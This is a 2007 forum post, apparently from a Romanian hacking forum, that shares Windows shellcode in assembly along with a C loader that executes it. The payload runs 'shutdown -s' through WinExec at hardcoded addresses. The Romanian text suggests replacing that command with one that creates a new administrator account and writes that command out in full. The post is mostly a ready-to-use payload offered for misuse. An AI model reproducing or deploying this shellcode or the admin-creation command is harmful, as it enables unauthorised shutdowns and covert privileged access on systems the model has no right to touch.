[ShellCode]Execute RUN commands

vladiii · October 19, 2007


/*;shutdown -s.asm
segment.code USE32
..start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp short funct1
funct2:
pop eax
mov byte [eax+11], dl
mov ebx, 0x77E82CF5 ;WinExec
push eax
call ebx
exit:
xor ebx, ebx
mov ebx, 0x77E7295D ;ExitProcess
push byte 1
call ebx
funct1:
call funct2
db 'shutdown -sN' */

/* This shellcode execute shutdown -s in Run. */

#include <stdio.h>
#include <windows.h>
char shellcode[]=
"\x31\xC0\x31\xDB\x31\xC9\x31\xD2\xEB"
"\x17\x58\x88\x50\x0B\xBB"
"\xF5\x2C\xE8\x77" /*WinExec offset*/
"\x50\xFF\xD3\x31\xDB\xBB\x5D\x29"
"\xE7\x77\x6A\x01\xFF\xD3\xE8\xE4\xFF"
"\xFF\xFF\x73\x68\x75\x74\x64\x6F\x77"
"\x6E\x20\x2D\x73\x4E\x00\x00";
int main(int argc, char **argv)
{
	int (*func)();
	func = (int ()) shellcode;
	(int)(*func)();
}

Cu acest cod ASM puteti executa comenzi in Run (in cazul meu shutdown -s). Spre exemplu. puteti inlocui comanda cu una de adaugare a unui nou administrator pe system, ex:


cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup Administrators /ADD USERNAMEN

Pentru nelamuriri/sugestii/buguri, lasati mesaj :-)

Sign In

[ShellCode]Execute RUN commands

Recommended Posts

vladiii

Join the conversation

Browse

Activity

Pages